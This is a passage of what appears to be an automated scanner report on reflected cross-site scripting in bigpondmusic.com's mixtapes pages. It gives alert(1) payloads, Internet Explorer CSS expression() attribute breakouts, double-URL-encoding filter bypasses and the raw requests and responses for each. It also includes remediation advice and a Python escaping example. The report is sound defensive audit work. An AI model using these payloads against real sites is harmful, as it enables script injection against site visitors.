<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/mixtapes5bd2d"><script>alert(1)</script>3d29116d9f7/" />
...[SNIP]...

2.298. http://bigpondmusic.com/mixtapes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /mixtapes/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21d55'%3b454f86f624d was submitted in the REST URL parameter 1. This input was echoed as 21d55';454f86f624d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; where it cannot be avoided, the value must be escaped for a JavaScript string literal (for example by \uXXXX-encoding every non-alphanumeric character) so that neither a quote nor a </script> sequence can leave the literal.
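An added example, not code from the report or the site: it models the s.channel assignment shown in 2.298, where the first path segment lands inside a single-quoted JavaScript string. The template and the assumption that the server builds the line by plain concatenation are inferred from the response body; the server code itself is not on the page. The hardened version applies \uXXXX escaping to every character outside [A-Za-z0-9], and a small scanner checks whether anything other than the terminating semicolon follows the closing quote.

```python
"""Model of the s.channel reflection from 2.298 and a JS-string-literal escaper.
Added example; the concatenation template is an assumption based on the
response body in the report."""

import string

JS_TEMPLATE = "s.channel = '{}';"
SAFE_CHARS = set(string.ascii_letters + string.digits)

# Constructed value, same shape as the REST URL parameter 1 payload in 2.298.
PAYLOAD_SEGMENT = "mixtapes21d55';454f86f624d"


def vulnerable_js(channel: str) -> str:
    """Modelled server behaviour: the path segment is concatenated verbatim."""
    return JS_TEMPLATE.format(channel)


def js_string_escape(value: str) -> str:
    """\\uXXXX-encode everything outside [A-Za-z0-9]. Characters above U+FFFF
    are emitted as a surrogate pair, which is how JavaScript strings store them."""
    parts = []
    for ch in value:
        if ch in SAFE_CHARS:
            parts.append(ch)
            continue
        units = ch.encode('utf-16-be')
        for i in range(0, len(units), 2):
            parts.append('\\u%04x' % int.from_bytes(units[i:i + 2], 'big'))
    return ''.join(parts)


def hardened_js(channel: str) -> str:
    """Same template, but the value is escaped for the string-literal context."""
    return JS_TEMPLATE.format(js_string_escape(channel))


def string_literal_body(js: str) -> str:
    """Return the body of the first single-quoted literal in `js`, honouring
    backslash escapes. Raise ValueError if anything other than ';' follows the
    closing quote, i.e. if the injected data turned into code."""
    start = js.index("'") + 1
    i = start
    while i < len(js):
        if js[i] == '\\':
            i += 2          # skip the escaped character
            continue
        if js[i] == "'":
            break
        i += 1
    trailing = js[i + 1:]
    if trailing != ';':
        raise ValueError('code follows the string literal: %r' % trailing)
    return js[start:i]


def breaks_out(js: str) -> bool:
    """True when the data escapes the string literal in the modelled assignment."""
    try:
        string_literal_body(js)
    except ValueError:
        return True
    return False


if __name__ == '__main__':
    print(vulnerable_js(PAYLOAD_SEGMENT), '->', 'breaks out' if breaks_out(vulnerable_js(PAYLOAD_SEGMENT)) else 'contained')
    print(hardened_js(PAYLOAD_SEGMENT), '->', 'breaks out' if breaks_out(hardened_js(PAYLOAD_SEGMENT)) else 'contained')
```

The escaper deliberately does not rely on a JSON encoder: json.dumps leaves < and > alone, so a value containing </script> would still close an inline script block. Encoding every non-alphanumeric character avoids that class of mistake for any of the quoting styles the page uses.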

Request

GET /mixtapes21d55'%3b454f86f624d/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:14:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87932


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
bpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'mixtapes21d55';454f86f624d';
   
   
       s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel;
   s.prop11 = 'Non-Registered-Music';
   s.prop12 = 'Non-Registe
...[SNIP]...

2.299. http://bigpondmusic.com/mixtapes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /mixtapes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8de29"style%3d"x%3aexpression(alert(1))"31aae0257c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8de29"style="x:expression(alert(1))"31aae0257c7 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a CSS expression() inside an injected style attribute to execute JavaScript; because the payload breaks out of the attribute with a double quote and needs no angle brackets, a filter that only blocks < and > does not stop it. CSS expressions are specific to Internet Explorer (dropped from IE8 standards mode onward) and do not execute in other browsers.

Request

GET /mixtapes/?8de29"style%3d"x%3aexpression(alert(1))"31aae0257c7=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:14:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 102578


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>BPM Mixtapes - BigPond Music
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/mixtapes/?8de29"style="x:expression(alert(1))"31aae0257c7=1" />
...[SNIP]...

2.300. http://bigpondmusic.com/mixtapes/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /mixtapes/

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6035a"style%3d"x%3aexpression(alert(1))"9e82f9f035d was submitted in the ref parameter. This input was echoed as 6035a"style="x:expression(alert(1))"9e82f9f035d in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a CSS expression() inside an injected style attribute to execute JavaScript; because the payload breaks out of the attribute with a double quote and needs no angle brackets, a filter that only blocks < and > does not stop it. CSS expressions are specific to Internet Explorer (dropped from IE8 standards mode onward) and do not execute in other browsers.

Request

GET /mixtapes/?ref=Net-Head-Music-Mixtapes6035a"style%3d"x%3aexpression(alert(1))"9e82f9f035d HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:14:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 102964


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>BPM Mixtapes - BigPond Music
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/mixtapes/?ref=Net-Head-Music-Mixtapes6035a"style="x:expression(alert(1))"9e82f9f035d" />
...[SNIP]...

2.301. http://bigpondmusic.com/mixtapes/all [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /mixtapes/all

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33e86'%3bd1df954475b was submitted in the REST URL parameter 1. This input was echoed as 33e86';d1df954475b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; where it cannot be avoided, the value must be escaped for a JavaScript string literal (for example by \uXXXX-encoding every non-alphanumeric character) so that neither a quote nor a </script> sequence can leave the literal.

Request

GET /mixtapes33e86'%3bd1df954475b/all HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87859


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
bpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'mixtapes33e86';d1df954475b';
   s.prop4 = 'all';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = '
...[SNIP]...

2.302. http://bigpondmusic.com/mixtapes/all [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /mixtapes/all

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b901%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee7182dfd609 was submitted in the REST URL parameter 1. This input was echoed as 2b901"><script>alert(1)</script>e7182dfd609 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but the check can be bypassed by double URL-encoding them: %253c is decoded once by the web server to %3c, which passes the filter, and is then decoded a second time by the application to <.

Remediation detail

There is probably no need for the application to URL-decode the value of REST URL parameter 1 a second time, since the web server has already decoded it once. In any case, input validation must run after all decoding and canonicalisation has been carried out, and the value should be HTML-encoded for the attribute context when it is written into the parentUrl field.

Request

GET /mixtapes2b901%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee7182dfd609/all HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87901


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/mixtapes2b901"><script>alert(1)</script>e7182dfd609/all" />
...[SNIP]...

2.303. http://bigpondmusic.com/mixtapes/all [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /mixtapes/all

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6dbd4'%3b059aceb2c2e was submitted in the REST URL parameter 2. This input was echoed as 6dbd4';059aceb2c2e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; where it cannot be avoided, the value must be escaped for a JavaScript string literal (for example by \uXXXX-encoding every non-alphanumeric character) so that neither a quote nor a </script> sequence can leave the literal.

Request

GET /mixtapes/all6dbd4'%3b059aceb2c2e HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:16:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87806


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
t,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'mixtapes';
   s.prop4 = 'all6dbd4';059aceb2c2e';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.304. http://bigpondmusic.com/mixtapes/all [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /mixtapes/all

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab33f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ebe2764287 was submitted in the REST URL parameter 2. This input was echoed as ab33f"><script>alert(1)</script>2ebe2764287 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but the check can be bypassed by double URL-encoding them: %253c is decoded once by the web server to %3c, which passes the filter, and is then decoded a second time by the application to <.

Remediation detail

There is probably no need for the application to URL-decode the value of REST URL parameter 2 a second time, since the web server has already decoded it once. In any case, input validation must run after all decoding and canonicalisation has been carried out, and the value should be HTML-encoded for the attribute context when it is written into the parentUrl field.

Request

GET /mixtapes/allab33f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ebe2764287 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:16:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88125


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/mixtapes/allab33f"><script>alert(1)</script>2ebe2764287" />
...[SNIP]...

2.305. http://bigpondmusic.com/mixtapes/all [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /mixtapes/all

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebf71"style%3d"x%3aexpression(alert(1))"6edf1b6c523 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ebf71"style="x:expression(alert(1))"6edf1b6c523 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a CSS expression() inside an injected style attribute to execute JavaScript; because the payload breaks out of the attribute with a double quote and needs no angle brackets, a filter that only blocks < and > does not stop it. CSS expressions are specific to Internet Explorer (dropped from IE8 standards mode onward) and do not execute in other browsers.

Request

GET /mixtapes/all?ebf71"style%3d"x%3aexpression(alert(1))"6edf1b6c523=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:15:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 98341


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Browse BPM Mixtapes - BigPon
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/mixtapes/all?ebf71"style="x:expression(alert(1))"6edf1b6c523=1" />
...[SNIP]...

2.306. http://bigpondmusic.com/mixtapes/celebrity [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /mixtapes/celebrity

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 823e0'%3b02f9b6b6a1a was submitted in the REST URL parameter 1. This input was echoed as 823e0';02f9b6b6a1a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; where it cannot be avoided, the value must be escaped for a JavaScript string literal (for example by \uXXXX-encoding every non-alphanumeric character) so that neither a quote nor a </script> sequence can leave the literal.

Request

GET /mixtapes823e0'%3b02f9b6b6a1a/celebrity HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:14:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87808


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
bpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'mixtapes823e0';02f9b6b6a1a';
   s.prop4 = 'celebrity';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop
...[SNIP]...

2.307. http://bigpondmusic.com/mixtapes/celebrity [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /mixtapes/celebrity

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 313ea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e316fc507611 was submitted in the REST URL parameter 1. This input was echoed as 313ea"><script>alert(1)</script>316fc507611 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but the check can be bypassed by double URL-encoding them: %253c is decoded once by the web server to %3c, which passes the filter, and is then decoded a second time by the application to <.

Remediation detail

There is probably no need for the application to URL-decode the value of REST URL parameter 1 a second time, since the web server has already decoded it once. In any case, input validation must run after all decoding and canonicalisation has been carried out, and the value should be HTML-encoded for the attribute context when it is written into the parentUrl field.

Request

GET /mixtapes313ea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e316fc507611/celebrity HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:14:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88349


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/mixtapes313ea"><script>alert(1)</script>316fc507611/celebrity" />
...[SNIP]...

2.308. http://bigpondmusic.com/mixtapes/celebrity [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /mixtapes/celebrity

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56e88'%3bff2886175b1 was submitted in the REST URL parameter 2. This input was echoed as 56e88';ff2886175b1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

